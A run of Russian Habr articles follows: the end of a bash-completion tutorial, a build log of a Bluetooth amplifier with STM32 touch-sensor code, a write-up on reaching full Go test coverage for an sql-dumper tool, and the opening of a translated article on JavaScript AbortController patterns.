если теперь мы запишем эту функцию вместе с приведенным выше вызовом complete в какой-нибудь скрипт, например ./complete.sh, выполним его в текущей консоли (лучше, конечно, для экспериментов запускать новый баш, а потом его убивать) как. ./complete sh, и, введя «script », нажмем Tab 2 раза, bash предложит нам варианты дополнения:
```
$ script
help history work
```
Соответственно, если начать вводить какую-то подкоманду, например wo и нажать Tab, то произойдёт автодополнение.
Однако я ещё не объяснил, как именно работает использованная в скрипте магия, а именно
```
COMPREPLY=( $(compgen -W "${subcommands_1}" -- ${cur}) ) #some magic
```
Тут мы заполняем список возвращаемых вариантов с помощью встроенной утилиты bash compgen.
Данная утилита принимает на вход список всех возможных значений аргумента, а так же текущую введенную часть аргумента, и выбирает те значения, до которых введенную часть можно дополнить. Введенная часть аргумента передается после --, а со списком возможных значений всё интереснее. В приведенном случае, возможные значения берутся (как указывает флаг -W) и данного скрипту списка слов (т.е. в приведенном выше примере — из subcommands\_1=«work history help»). Однако там можно указывать и другие флаги — например -d — и тогда compgen будет дополнять исходя из существующих на машине директорий, или -f — тогда он будет дополнять до файлов.
Можно посмотреть, что он выдаёт:
```
$ compgen -W "qwerty qweasd asdfgh" -- qwe
qwerty
qweasd
```
Соответственно можно генерировать различные списки кандидатов на автодополнение. Например, для решаемой задачи, нам (для импорта и экспорта истории) нужен список возможных проектов. В моём случае, каждому проекту соответствует директория в "${HOME}/projects", соответственно кандидатов можно подбирать как
`COMPREPLY=($(compgen -W "`ls ${HOME}/projects`" -- ${cur}))`
Таким образом, автодополнение работает просто: смотрим на аргументы, введённые до текущего, и исходя из соображений синтаксиса вызова нужной команды генерируем список возможных значений текущего аргумента. После чего список претендентов фильтруется по уже введенной части аргумента, и передается башу. Если претендент один, то баш его и подставляет. Всё просто.
В завершение — моя топорная реализация автодополнения для модели, указанной в начале:
```
_my_command()
{
COMPREPLY=()
cur="${COMP_WORDS[COMP_CWORD]}"
subcommands_1="work history help" #возможные подкоманды первого уровня
subcommands_history="import export" #возможные подкоманды для history
if [[ ${COMP_CWORD} == 1 ]] ; then # цикл определения автодополнения при вводе подкоманды первого уровня
COMPREPLY=( $(compgen -W "${subcommands_1}" -- ${cur}) )
return 0
fi
subcmd_1="${COMP_WORDS[1]}" #К данному моменту подкоманда первого уровня уже введена, и мы её выбираем в эту переменную
case "${subcmd_1}" in #Дальше смотри, что она из себя представляет
work)
COMPREPLY=() #ничего дальше вводить не надо
return 0
;;
history)
if [[ ${COMP_CWORD} == 2 ]] ; then #введены script history; надо подставить import или export
COMPREPLY=( $(compgen -W "${subcommands_history}" -- ${cur}) )
return 0
fi
#к данному моменту мы уже знаем, что делаем: импорт или экспорт
subcmd_2="${COMP_WORDS[2]}"
if [[ ${COMP_CWORD} == 3 ]] ; then #но в любом случае следующим аргументом идет имя проекта.
COMPREPLY=($(compgen -W "`ls ${HOME}/projects`" -- ${cur}))
return 0
fi
case "${subcmd_2}" in #а дальше у импорта и экспорта набор флагов разный. мы смотрим на предпоследний аргумент, и если он является флагом - подставляем соответствующие ему значения, иначе - выдаем на дополнение список флагов.
import)
case "${COMP_WORDS[COMP_CWORD-1]}" in
-src)
COMPREPLY=($(compgen -d -- ${cur})) #тут должна быть директория с исходниками
return 0
;;
-file)
COMPREPLY=($(compgen -f -- ${cur})) #тут должен быть импортируемый файл
return 0
;;
*)
COMPREPLY=($(compgen -W "-src -file" -- ${cur})) #список возможных флагов
return 0
;;
esac
;;
export) #у экспорта только один флаг -o, если был он - то мы предлагаем дополнение до файла, куда экспортировать, иначе - предлагаем дополнение до флага
if [[ ${COMP_WORDS[COMP_CWORD-1]} == "-o" ]] ; then
COMPREPLY=($(compgen -f -- ${cur}))
return 0
fi
COMPREPLY=($(compgen -W "-o" -- ${cur}))
return 0
;;
*)
;;
esac
;;
help) #список возможных дополнений после help совпадает со списком подкоманд первого уровня, их и исследуем.
COMPREPLY=( $(compgen -W "${subcommands_1}" -- ${cur}))
return 0
;;
esac
return 0
}
complete -F _my_command script
```
Ну и самое главное — подключение нашего скрипта к башу на постоянной основе. Это делается либо (топорно) прописыванием вызова нашего скрипта в .bashrc, либо (стандартно, если у вас есть такой файл: ) через /etc/bash\_completion. Во втором случае мы должны положить наш скрипт в /etc/bash\_completion.d, все скрипты откуда подцепляются из /etc/bash\_completion.
P.S.: Напомню, что положительный фидбек стоит оставлять в карме пользователя [infthi](https://habrahabr.ru/users/infthi/) | https://habr.com/ru/post/115886/ | null | ru | null |
# Самодельный Bluetooth усилитель АБ класса с автоматизацией управления питанием
Всё началось с лени.
А точнее, с Веги 50у-122с, доставшейся в наследство вместе с акустикой Электроника 25ас-033. И вначале всё было хорошо. А потом, споткнувшись за провод, был убит ноут. После этого, в Веге появился BT модуль, а сама Вега научилась включаться по подключению устройств к этому модулю.
Время шло и качества стало мало. Тогда был проведён Веге первый апгрейд. Потом второй. Потом акустике. Потом… Потом пришло понимание что надо делать что-то качественно новое. Ну а когда Вега стала хрипеть и замаячила перспектива полной перепайки всех электролитов…
И началось строительство…
Кому лень читать технические подробности и хочется просто посмотреть как это работает — можно прокрутить в конец, там сокращённая видео версия для моего канала.

Это не рассказ про то, как спаять такое. Это не инструкция: не будет схем, не будет описания настройки итд.
Это будет рассказ, про идеи и технологии, которые я применяю в своих устройствах.
Идеи, которые я воплотил сам, и которые, может, захотите воплотить вы.
**Итак.**
Базовая идея. Хочу усилитель. Но не хочу путаться в проводах. Это и не удобно и не столь качественно как хотелось бы. Нужно некое беспроводное решение.
Вторая идея. Я не хочу куда-то там бегать и тыкать кнопочки. Особенно если я хочу послушать релаксирующую музыку перед сном. Да, я ленивая скотина, я хочу лечь на диван, нажать кнопку питания ноутбука и что б всё включилось и заиграло само. А когда я буду засыпать и ноут выключится скриптом — выключилось вслед за ним.
Третья идея. Таймеры. Иначе говоря — на выходных я ноут на ночь не выключаю. А это значит, что если реализовано просто включение питания по блютусу, то так всю ночь и будет включён усилитель. Как-то не круто, учитывая что во-первых снашиваются фильтрующие конденсаторы. А во-вторых, оно банально греется и пожирает электричество.
Идея четвёртая. Хочу индикатор. Большой. Красивый. Индикатор. И тут я нашёл ИН-33, на радостях аж написав [предыдущую статью](https://geektimes.ru/post/264154/). Но не сказать что он большой, поэтому была найдена хитрость с плёночкой от монитора, которая визуально «раздваивает» шкалу.
**В итоге**, по обдумыванию всех идей, я пришёл к тому, что надо делать новый усилитель и с нуля.
Был заказан [блютус модуль с apt-x](http://fas.st/yP3QX):

Были заказаны [готовые усилители AB класса](http://fas.st/Lndjz):

Был куплен у деда шикарный ТОР на 200 Вт всего за 1000 руб. с готовыми отводами 2х26в и 2х12в. А вот остальное уже делал сам.
**Корпус.**
Корпус делался 300х300мм, низ — дюралюминиевая пластина толщиной 5мм на неё крепится П образно согнутый уголок 50\*100\*5мм, к которому и крепятся транзисторы через силиконовые прокладки и комплекта, а сверху всё стягивается болтами и планкой 20\*6мм


Лицевая панель — минеральное стекло. Стекло бралось с фото рамки за 300 руб и подрезалось в нужный размер обычным стеклорезом.
Затем заказывалась шелкография. Причём, рекомендую не кроить на краске и таки сделать с краской по стеклу. Иначе оно рано или поздно отслоится и будет жаль.

Причём, рекомендую именно шелкографию, потому что прямая печать фигня. Поясню:
Прямая печать на просвет (другой проект)

А вот шелкография на просвет:

Отверстие под регулятор громкости просто сверлится сверлом по стеклу.
Причём, если делаете это в первый раз, рекомендую таки потренироваться. Это не так быстро и просто как кажется.

Затем сенсоры. На стекло наклеивался белый двойной скотч. Затем бралась медная фольга, с одной стороны заклеивалась скотчем, с другой ЛУТом наносился рисунок и травилось «насквозь».
Получалось вот так:

Затем фольга снималась, всё отмывалось и получалось:

Это готовые заготовки для сенсоров. К ним паялись отводы и вся конструкция лепилась на лицевую панель.

Важно точное совмещение. Потому что всё должно работать на просвет.

Далее индикатор. Для «расширения» шкалы применялась призматическая подложка от матрицы монитора. А что б она точно легла, клеилась суперклеем. Клея не жалеть!
Важно выгнать все пузыри и накладывать плёнку много шире самого индикатора, иначе клей перетечёт на обратную сторону и всё испортит.
Ну и надо учитывать, что «раздваивает» эта плёнка только в одной плоскости, так что важно выдержать строгую горизонтальность призм плёнки.

На этом, если всё подсветить изнутри, получится как-то так:

Но вот сделать ровную подсветку символов не так просто, как может показаться.
Дело в том, что если просто взять светодиод и начать светить, то свет засвечивает и часть иконки. Смотрится некрасиво. Причём, если в полутьме ещё может казаться что всё не плохо, то в полной темноте будет масса косяков засветки. Раздражало.
Выход такой:
Бралась фольга, скручивалась в конус:

Затем разогревался термоклей. Утюг мне для этого дюже понравился, хотя жена не разделяла моей радости…

Затем заливалось и обрезалось по размеру подсвечиваемой иконки, с обратной стороны сверлилось углубление под светодиод.

Ну и приклеивалось. Я клеил суперклеем. Но потом подумалось, что лучше б просто разогреть клей конуса и прям на него и приклеить.
А небольшие пробелы между фольгой конуса и фольгой иконки, заклеивались замазкой и закрашивались. Замазка — что б краска не затекла между светофильтром и сенсором. После установки светодиодов иконок — и они с торца закрашивались. Только так я смог полностью избавиться от сторонних заветов.
**По схеме.**
Начну с блоков питания. Их 2.
Первый — силовой блок питания, не стабилизирован по напряжению. Собран по схеме с 2-мя отдельными диодными мостами, в каждом плече по 33в постоянки и 3х10 000 мкФ блок электролитов, зашунтированных 0.33мкФ плёнкой и 1мкФ керамикой. Так же, и сами обмотки трансформатора зашунтированы 1мкф керамикой.
Силовая разводка: от трансформатора до мостов 2.5мм^2, от мостов до блоков конденсаторов — 4мм^2, от конденсаторных блоков до план усилителей 6мм^2.
Второй — дежурный. Плату блютус модуля надо постоянно питать, что б к ней всегда можно было подключиться. Ну а что б понимать что к усилителю подключились и включить основное питание — питать надо и плату контроллера. Поэтому, дежурный блок маломощный и импульсный. Взята просто зарядка от асуса еее. Причём, аналоговая часть, а именно блютус модуль, запитан через дополнительный линейный стабилизатор.
Платы усилителей тоже пришлось полностью перепропаивать. Одна плата была ещё ничего, но вот вторая спаяна была просто похабно. + дополнительно пролудил силовые дорожки.
В качестве центрального «мозга» был выбран STM32. В принципе, я мог бы использовать и ардуину на AVRке, но у мег во-первых мало ног, а во-вторых всего один АЦП, из-за чего плохо работает индикатор. Дело в том, что пока оцифровываем один канал — звук меняется в обоих, и к моменту оцифровки второго, разница уже достаточно велика. Это бросается в глаза и этого хотелось избежать. Поэтому и STM32.
Схема индикатора мало чем отличается от схемы из предыдущей статьи (кстати, похоже никто так и не заметил ошибку в схеме, ну да ладно).
**Управление.**
Нужны были сенсорные клавиши. Порывшись в статьях про сенсорику для STM32, нашёл несколько вариантов, от которых был не в восторге.
Во-первых я ничего не понял )))
Во-вторых, мне надо было 5 кнопок. Да ещё и что б работало оно через 3-х мм минеральное стекло.
В итоге, пришлось вкурить в принцип, немного поэкспериментировать и получил следующий код:
**Код считывания сенсорики**
```
//Чуствительность
#define SenseMinLevel 100
//Пины
#define ButZ GPIOA, GPIO_Pin_10
#define BtnOn GPIOB, GPIO_Pin_15
#define BtnOff GPIOA, GPIO_Pin_8
#define BtnAuto GPIOA, GPIO_Pin_9
#define BtnBT GPIOA, GPIO_Pin_3
#define BtnRCA GPIOA, GPIO_Pin_2
//Значение автокалиброки
volatile uint16_t CalibrateTimeB1 = 0;
volatile uint16_t CalibrateTimeB2 = 0;
volatile uint16_t CalibrateTimeB3 = 0;
volatile uint16_t CalibrateTimeB4 = 0;
volatile uint16_t CalibrateTimeB5 = 0;
//Возвращает код нажатой кнопки
uint8_t SenseButton(void)
{
uint16_t m;
uint16_t b1 = 0; uint16_t b2 = 0; uint16_t b3 = 0; uint16_t b4 = 0; uint16_t b5 = 0;
for (m = 0; m < 21; m++)
{
b1 += scan_sense_pin(BtnOff);
b2 += scan_sense_pin(BtnOn);
b3 += scan_sense_pin(BtnAuto);
b4 += scan_sense_pin(BtnBT);
b5 += scan_sense_pin(BtnRCA);
}
if (CalibrateTimeB1 == 0)
{
CalibrateTimeB1 = b1;
CalibrateTimeB2 = b2;
CalibrateTimeB3 = b3;
CalibrateTimeB4 = b4;
CalibrateTimeB5 = b5;
}
else
{
if (b1 > CalibrateTimeB1) b1 -= CalibrateTimeB1; else b1 = 0;
if (b2 > CalibrateTimeB2) b2 -= CalibrateTimeB2; else b2 = 0;
if (b3 > CalibrateTimeB3) b3 -= CalibrateTimeB3; else b3 = 0;
if (b4 > CalibrateTimeB4) b4 -= CalibrateTimeB4; else b4 = 0;
if (b5 > CalibrateTimeB5) b5 -= CalibrateTimeB5; else b5 = 0;
}
//Сравнение с калибровочными уровнями
if (b1 > SenseMinLevel || b2 > SenseMinLevel || b3 > SenseMinLevel || b4 > SenseMinLevel || b5 > SenseMinLevel)
{
if (b1 > b2 && b1 > b3 && b1 > b4 && b1 > b5)
return 1;
if (b2 > b1 && b2 > b3 && b2 > b4 && b2 > b5)
return 2;
if (b3 > b1 && b3 > b2 && b3 > b4 && b3 > b5)
return 3;
if (b4 > b1 && b4 > b3 && b4 > b2 && b4 > b5)
return 4;
if (b5 > b1 && b5 > b3 && b5 > b4 && b5 > b2)
return 5;
}
return 0;
}
uint16_t scan_sense_pin(GPIO_TypeDef* port, uint16_t pin)
{
uint16_t ret = 0;
GPIO_ResetBits(ButZ);
delay_t(1800);
GPIO_SetBits(ButZ);
while (!GPIO_ReadInputDataBit(port, pin) && ret < 500)
{
ret++;
}
GPIO_ResetBits(ButZ);
return ret;
}
void delay_t(uint32_t ms) {
// nCount=(RCC_Clocks.HCLK_Frequency/1000)*ms;
// for (; nCount!=0; nCount--);
for (; ms!=0; ms--);
}
```
Где — ButZ — затравочный пин, в режиме GPIO\_Mode\_Out\_PP, остальные — считывающие в режиме GPIO\_Mode\_IN\_FLOATING
Идея проста. Все считывающие сенсоры подключены к затравочному пину через резистор на 3МОм. Далее даём единицу на затравочный пин и смотрим — как долго будет заряжаться до логической единицы пин сенсора. Если дольше калибровочного времени — значит заряжать приходится и палец, к сенсору прислонённый. А значит — есть прикосновение к сенсору.
**Режимы работы**
Их три.
Первый — Просто выключено. И всё.
Второй режим — постоянного включения. В этом случае усилитель всегда работает. Правда, в случае простоя без звука, через минуту выключается индикатор уровня.
Третий — «А». А вот это — главный режим, автоматический. Если выбран блютус вход, то усилитель включается и выключается по подключению источника звука. Но если устройство подключилось и не играет — через 15 минут усилитель перейдёт в режим ожидания звука. И, конечно, если звука нет в течении минуты — выключается индикатор уровня.
Причём, не важно, какой аудио вход используется — будь то блютус или внешний RCA вход.
В общем-то остальное всё стандартно. Ручка громкости просто переменный резистор. Просто потому что основной регулятор громкости предполагается на ноутбуке и к усилителю для этого никто ходить не будет.
Результат — красиво. И не плохо звучит!
Видео: | https://habr.com/ru/post/369323/ | null | ru | null |
# По дороге к 100% покрытия кода тестами в Go на примере sql-dumper

В этом посте я расскажу о том, как я писал консольную программу на языке Go для выгрузки данных из БД в файлы, стремясь покрыть весь код тестами на 100%. Начну с описания, зачем мне нужна была это программа. Продолжу описанием первых трудностей, некоторые из которых вызваны особенностями языка Go. Дальше немного упомяну сборку на Travis CI, а затем расскажу о том, как я писал тесты, пытаясь покрыть код на 100%. Немного затрону тестирование работы с БД и файловой системой. А в заключении скажу о том, к чему приводит стремление максимально покрыть код тестами и о чём говорит этот показатель. Материал я сопровожу ссылками как на документацию, так и на примеры коммитов из своего проекта.
Назначение программы
====================
Программа должна запускаться из командной строки с указанием списка таблиц и некоторых их столбцов, диапазона данных по первому указанному столбцу, перечислением связей выбираемых таблиц между собой, с возможностью указать файл с настройками подключения к БД. Результатом работы должен быть файл, в котором описаны запросы на создания указанных таблиц с указанными столбами и insert-выражения выбранных данных. Предполагалось, что использование такой программы упростит сценарий извлечения порции данных из большой БД и разворачивания этой порции локально. Кроме того, эти sql-файлы выгрузок предполагалось обрабатывать другой программой, которая заменяет часть данных по определенному шаблону.
Такого же результата можно добиться, используя любой из популярных клиентов к БД и достаточно большим объёмом ручной работы. Приложение же должно было упростить этот процесс и максимально автоматизировать.
Эту программу должны были разработать мои стажёры с целью обучения и последующего использования в их дальнейшем обучении. Но ситуация получилась такая, что от этой задумки отказались. А я всё же решил попробовать сам написать в свободное время такую программу в целях своей практики разработки на языке Go.
Решение неполное, имеет ряд ограничений, которые описаны в README. В любом случае, это не боевой проект.
[Примеры использования и исходный код](https://github.com/rnixik/sql-dumper).
Первые трудности
================
Список таблиц и их столбцов передаётся в программу аргументом в виде строки, то есть он заранее неизвестен. Большинство примеров по работе с БД на Go подразумевало то, что структура БД заранее известна, мы просто создаем `struct` с указанием типов у каждого столбца. Но в этом случае так не получится.
Решением для этого стало использование метода `MapScan` из `github.com/jmoiron/sqlx`, который создавал слайс интерфейсов в размере, равном количеству столбцов выборки. Дальше вопросом стало, как из этих интерфейсов получить реальный тип данных. Решением является [switch-case по типу](https://tour.golang.org/methods/16). Такое решение выглядит не очень красивым, потому что нужно будет все типы приводить к строке: целые — как есть, строки — экранировать и оборачивать в кавычки, но при этом описывать все типы, которые могут прийти из БД. Более элегантного способа решения этого вопроса я не нашёл.
С типами проявилась еще особенность языка Go — переменная типа string не может принимать значение `nil`, но из БД может прийти как пустая строка, так и `NULL`. Для решения этой проблемы в пакете `database/sql` есть [решение](https://golang.org/pkg/database/sql/#NullString) — использовать специальные `struсt`, которые хранят в себе значение и признак, `NULL` это или нет.
Сборка и вычисление процента покрытия кода тестами
==================================================
Для сборки я использую Travis CI, для получения процента покрытия кода тестами — Coveralls. Файл `.travis.yml` для сборки довольно простой:
```
language: go
go:
- 1.9
script:
- go get -t -v ./...
- go get golang.org/x/tools/cmd/cover
- go get github.com/mattn/goveralls
- go test -v -covermode=count -coverprofile=coverage.out ./...
- $HOME/gopath/bin/goveralls -coverprofile=coverage.out -service=travis-ci -repotoken $COVERALLS_TOKEN
```
В настройках Travis CI нужно только указать переменную окружения `COVERALLS_TOKEN`, значение которой нужно взять на [сайте](https://coveralls.io).
Coveralls позволяет удобно узнать, какой процент у всего проекта, у каждого файла, подсветить строчку исходного кода, которая оказалась непокрытой тестом. Например, в [первом билде](https://coveralls.io/builds/17987192/source?filename=request.go) видно, что я не написал тестов на некоторые случаи возникновения ошибок при разборе пользовательского запроса.
Покрытие кода тестами на 100% означает, что написаны тесты, которые, помимо прочего, выполняют код на каждое ветвление в `if`. Это самая объёмная работа при написании тестов, да и, в целом, при разработке приложения.
Вычислять покрытие тестами можно и локально, например, той же `go test -v -covermode=count -coverprofile=coverage.out ./...`, но делать это ещё и в CI солиднее, можно плашку на Github разместить.
Раз уж зашла речь о плашках, то я считаю полезной плашку от <https://goreportcard.com>, которая проводит анализ по следующим показателям:
* gofmt – форматирование кода, в том числе [упрощение конструкций](https://github.com/rnixik/sql-dumper/commit/d25ce5018ee888d66acc479a3e550e8d05470269)
* go\_vet – проверяет подозрительные конструкции
* gocyclo – показывает проблемы в цикломатической сложности
* golint – для меня это проверка наличия всех необходимых комментариев
* license – в проекте должна быть лицензия
* ineffassign – проверяет неэффективные присвоения
* misspell – проверяет на опечатки
Трудности покрытия кода тестами на 100%
=======================================
Если разбор небольшого пользовательского запроса на составные части в основном работает с преобразованием строк в некоторые структуры из строк и довольно легко покрывается тестами, то для тестирования кода, который работает с БД решение не столь очевидное.
Как вариант, подключаться к настоящему серверу БД, в каждом тесте предзаполнять данными, проводить выборки, очищать. Но это сложное решение, далеко от unit-тестирования и накладывает свои требования на окружение, в том числе на CI-сервере.
Другим вариантом могло быть использование БД в памяти, например, sqlite (`sqlx.Open("sqlite3", ":memory:")`), но это подразумевает, что код должен быть как можно слабее привязан к движку БД, а это значительно усложняет проект, но для интеграционного теста вполне хорошо.
Для unit-тестирования подойдет использование mock для БД. Я нашёл [этот](https://github.com/DATA-DOG/go-sqlmock). С помощью этого пакета можно тестировать поведение как в случае обычного результата, так и в случае возникновения ошибок, указав, какой запрос какую ошибку должен вернуть.
Написание тестов показало, что функцию, которая осуществляет подключение к реальной БД, нужно вынести в main.go, так можно будет её переопределить в тестах на ту, которая будет возвращать mock-экземпляр.
Кроме работы с БД нужно вынести в отдельную зависимость работу с файловой системой. Это позволит подменять запись реальных файлов на запись в память для удобства тестирования и уменьшит зацепление (coupling). Так появился интерфейс `FileWriter`, а вместе с ним и интерфейс возвращаемого им файла. Для тестирования сценариев ошибки были созданы вспомогательные реализации этих интерфейсов и размещены в файле `filewriter_test.go`, таким образом, они не попадают в общий билд, но могут быть использованы в тестах.
Через некоторое время у меня возник вопрос, как покрыть тестами `main()`. На тот момент у меня там было достаточно кода. Как показали результаты поиска, таким в [Go не занимаются](https://stackoverflow.com/a/31352478). Вместо этого, весь код, который можно вынести из `main()`, нужно вынести. В своём коде я оставил только разбор опций и аргументов командной строки (пакет `flag`), подключение к БД, инстанцирование объекта, который будет заниматься записью файлов, и вызов метода, который будет выполнять всю остальную работу. Но эти строки не позволяют получить ровно 100% покрытия.
В тестировании Go есть такое понятие, как "[Example functions](https://golang.org/pkg/testing/#hdr-Examples)". Это тестовые функции, которые сравнивают вывод с тем, что описан в комментарии внутри такой функции. Примеры таких тестов можно найти в [исходном коде пакетов go](https://golang.org/src/sort/). Если такие файлы не содержат тестов и бенчмарков, то именуются они с префиксом `example_` и оканчиваются на `_test.go`. Имя каждой такой тестовой функции должно начинаться с `Example`. На этом я и написал тест для объекта, который занимается записью sql в файл, заменив реальную запись в файл на мок, из которого можно достать содержимое и вывести. Этот вывод и сравнивается с эталоном. Удобно, не нужно писать руками сравнение, да и несколько строк удобно писать в комментарии. Но когда дело дошло до теста на объект, который записывает данные в csv-файл, возникли трудности. По [RFC4180](https://tools.ietf.org/html/rfc4180) строки в CSV должны отделяться CRLF, а `go fmt` заменяет все строки на LF, что приводит к тому, что эталон из комментария не совпадает с актуальным выводом из-за разных разделителей строк. Пришлось для этого объекта писать обычный тест, при этом ещё и файл переименовывать, убрав `example_` из него.
Остался вопрос, если файл, допустим, `query.go` тестируется и по Example и по обычным тестам, должно ли быть два файла `example_query_test.go` и `query_test.go`? Здесь, например, есть только один `example_test.go`. Использовать поиск по "go test example" то ещё развлечение.
Писать тесты в Go я учился по руководствам, которые выдаёт Google по запросу "go writing tests". Большинство из тех, которые мне попадались ([1](https://www.golang-book.com/books/intro/12), [2](https://blog.alexellis.io/golang-writing-unit-tests/), [3](https://medium.com/@matryer/5-simple-tips-and-tricks-for-writing-unit-tests-in-golang-619653f90742), [4](https://github.com/quii/learn-go-with-tests/blob/master/structs-methods-and-interfaces.md)), предлагают сравнивать полученный результат с ожидаемым конструкцией вида
```
if v != 1.5 {
t.Error("Expected 1.5, got ", v)
}
```
Но когда дело доходит до сравнения типов, привычная конструкция эволюционно перерождается в нагромождение из использования "reflect" или type assertation. Или ещё пример, когда нужно проверить, что в slice или map есть необходимое значение. Код становится громоздким. Так и хочется писать свои [вспомогательные функции](https://github.com/rnixik/sql-dumper/blob/d25ce5018ee888d66acc479a3e550e8d05470269/utils_test.go#L21) для теста. Хотя хорошим решением здесь является использовать библиотеку для тестирования. Я нашёл <https://github.com/stretchr/testify>. Она позволяет делать [сравнения одной строкой](https://github.com/rnixik/sql-dumper/blob/cec1f2b6b6383f4065380df7cd97f579e93405bc/run_test.go#L117). Такое решение сокращает объём кода и упрощает чтение и поддержку тестов.
Дробление кода и тестирование
=============================
Написание теста на высокоуровневую функцию, которая работает с несколькими объектами, позволяет одним разом существенно поднять значение покрытия кода тестами, потому что в ходе этого теста выполняется много строк кода отдельных объектов. Если ставить себе цель только 100% покрытие, то пропадает мотивация писать unit-тесты на мелкие компоненты системы, потому что это не влияет на значение code coverage.
Кроме того, если в тест-функции не проверять результат, то это тоже не будет влиять на значение code coverage. Можно получить высокое значение покрытия, но при этом не обнаружить серьезные ошибки в работе приложения.
С другой стороны, если у вас есть [код с множеством ветвлений](https://github.com/rnixik/sql-dumper/blob/db56e8e7287b158549dcff57bf64d5fbea6d1e73/run.go#L35), после которых вызывается объемная функция, то покрыть его тестами будет сложно. И здесь у вас появляется стимул этот код улучшить, например, [вынести](https://github.com/rnixik/sql-dumper/blob/e4590eadbeed58d42850e46bc491b61e9a43bc5f/run.go#L42) все ветвления в отдельную функцию и написать на нее [отдельный тест](https://github.com/rnixik/sql-dumper/blob/e4590eadbeed58d42850e46bc491b61e9a43bc5f/run_test.go#L110). Это положительно повлияет на читаемость кода.
Если код имеет сильное зацепление (coupling), то, скорее всего, вы не сможете написать на него тест, а значит, вам придется внести в него изменения, что положительно скажется на качестве кода.
Заключение
==========
До этого проекта мне не приходилось ставить себе цель в 100% покрытия кода тестами. Работоспособное приложение я мог получить за 10 часов разработки, но на достижение 95% покрытия у меня ушло от 20 до 30 часов времени. На небольшом примере я получил представление о том, как значение покрытия кода влияет на его качество, сколько уходит усилий на его поддержку.
Мой вывод заключается в том, что если вы видите у кого-то плашку с высоким значением покрытия кода, то это почти ничего не говорит о том, как хорошо протестировано это приложение. Всё равно нужно смотреть сами тесты. Но если вы сами взяли курс на честные 100%, то это поможет вам написать приложение качественнее.
Подробнее об этом вы можете почитать в следующих материалах и комментариях к ним:
* [The tragedy of 100% code coverage](https://labs.ig.com/code-coverage-100-percent-tragedy), это же на [Хабре](https://habr.com/company/everydaytools/blog/328406/)
* [О том, как можно иметь 100% покрытие, но при этом ничего не проверять](https://jeroenmols.com/blog/2017/11/28/coveragproblem/)
**Спойлер**Слово «покрытие» использовано около 20 раз. Простите. | https://habr.com/ru/post/418565/ | null | ru | null |
# JavaScript: интересные возможности AbortController

Привет, друзья!
Представляю вашем вниманию адаптированный и дополненный перевод [этой замечательной статьи](https://whistlr.info/2022/abortcontroller-is-your-friend/).
[AbortController](https://developer.mozilla.org/ru/docs/Web/API/AbortController) и [AbortSignal](https://developer.mozilla.org/ru/docs/Web/API/AbortSignal) предоставляют возможность применения некоторых интересных паттернов, рассмотрению которых и посвящена данная статья.
Однако давайте начнем с типичного примера использования `AbortController`.
Предположим, что у нас имеется такая разметка:
```
Задержка в мс:
Отправить запрос
Прервать запрос
```
Скрипт:
```
// в чистом `JS` доступ к элементам с идентификаторами
// можно получать напрямую
// `window.fetchBtn === document.getElementById('fetchBtn')`
fetchBtn.onclick = async () => {
// создаем экземпляр контроллера
const controller = new AbortController()
abortBtn.addEventListener(
'click',
() => {
// прерываем запрос
controller.abort()
},
{ once: true }
)
try {
logBox.textContent = 'Start fetching'
const response = await fetch(
// указываем задержку
`https://jsonplaceholder.typicode.com/users/1?_delay=${delayInput.value}`,
// передаем сигнал
{ signal: controller.signal }
)
logBox.textContent = 'End fetching'
const data = await response.json()
dataBox.textContent = JSON.stringify(data, null, 2)
} catch (e) {
// если запрос был прерван
if (e.name === 'AbortError') {
logBox.textContent = 'Request aborted'
} else {
console.error(e)
}
}
}
```
Запрос выполняется с задержкой, указанной в соответствующем поле. Если во время выполнения запроса возникает событие нажатия кнопки `abortBtn`, выполнение запроса прекращается — выбрасывается исключение `AbortError`.
*Обратите внимание*: запрос может прерываться не только в результате пользовательских действий, но и программно: можно запустить параллельное выполнение нескольких запросов с помощью [Promise.race](https://developer.mozilla.org/ru/docs/Web/JavaScript/Reference/Global_Objects/Promise/race) и при завершении первого прервать остальные.
Контроллер и сигнал
-------------------
Еще раз взглянем на сигнатуру `AbortController`:
```
const controller = new AbortController()
const { signal } = controller
```
`signal` — это экземпляр класса `AbortSignal`. Для чего нужны 2 разных класса? Дело в том, что они выполняют разные задачи:
* контроллер позволяет владельцу прерывать сигнал с помощью `controller.abort()`;
* сигнал не может прерываться напрямую: его можно либо передавать, например, в `fetch`, либо обрабатывать изменение его состояния вручную.
Прерванное состояние проверяется с помощью `signal.aborted` или через обработчик события `abort` (`fetch` реализует это самостоятельно).
Проще говоря, вещи, которые должны быть прерываемыми, не должны иметь возможности прерывать самих себя, поэтому они получают лишь `AbortSignal`.
Случаи использования
--------------------
### Прерывание "легаси" объектов
Некоторые старые части `DOM API` не поддерживают `AbortSignal`. Одной из таких частей является [WebSocket](https://developer.mozilla.org/ru/docs/Web/API/WebSockets_API), предоставляющий метод `close` для закрытия соединения. Реализовать его прерывание можно следующим образом:
```
function createAbortableSocket(url, signal) {
const w = new WebSocket(url)
if (signal.aborted) {
w.close() // сигнал прерван, закрываем соединение
}
signal.addEventListener('abort', () => w.close(), { once: true })
return w
}
```
*Обратите внимание*: если сигнал уже прерван, событие `abort` не возникает — в этом случае мы сразу закрываем соединение с помощью метода `close`.
### Удаление обработчиков событий
Следующий код работать не будет:
```
window.addEventListener('resize', () => doSomething())
// не надо так делать
window.removeEventListener('resize', () => doSomething())
```
Две функции обратного вызова — это разные объекты, поэтому удаление несуществующего обработчика просто тихо завершается неудачей.
`AbortSignal` позволяет передать обработчику сигнал для его отмены:
```
const controller = new AbortController()
const { signal } = controller
window.addEventListener('resize', () => doSomething(), { signal })
// позднее
controller.abort()
```
*Обратите внимание*: в старых браузерах приведенный пример работать не будет. [Полифил](https://gist.github.com/samthor/2e11de5976fe673557b0ee14a3cb621a).
### Паттерн "Конструктор"
В процессе инкапсуляции кода одним из важных вопросов для решения является вопрос о способе управления жизненным циклом объекта. Это имеет принципиальное значение для кода, который имеет четкие начало и конец выполнения, будь то запрос к `API`, рендеринг компонента, открытие сокета и др.
Вот как обычно выглядит такой код:
```
const someObject = new SomeObject()
someObject.start()
// позднее
someObject.stop()
```
`AbortSignal` позволяет сделать его более эргономичным:
```
const controller = new AbortController()
const { signal } = controller
const someObject = new SomeObject(signal)
// позднее
controller.abort()
```
Когда это может пригодиться?
1. Это делает использование `SomeObject` однократным, его состояние переходит от запуска до остановки только один раз. Когда требуется другой `SomeObject`, просто создается новый экземпляр.
2. Один `AbortSignal` может распределяться между несколькими `SomeObject` для их одновременной остановки после выполнения связанной группы задач.
3. `SomeObject` может передавать полученный сигнал дальше, например, в `fetch`.
```
export class SomeObject {
constructor(signal) {
this.signal = signal
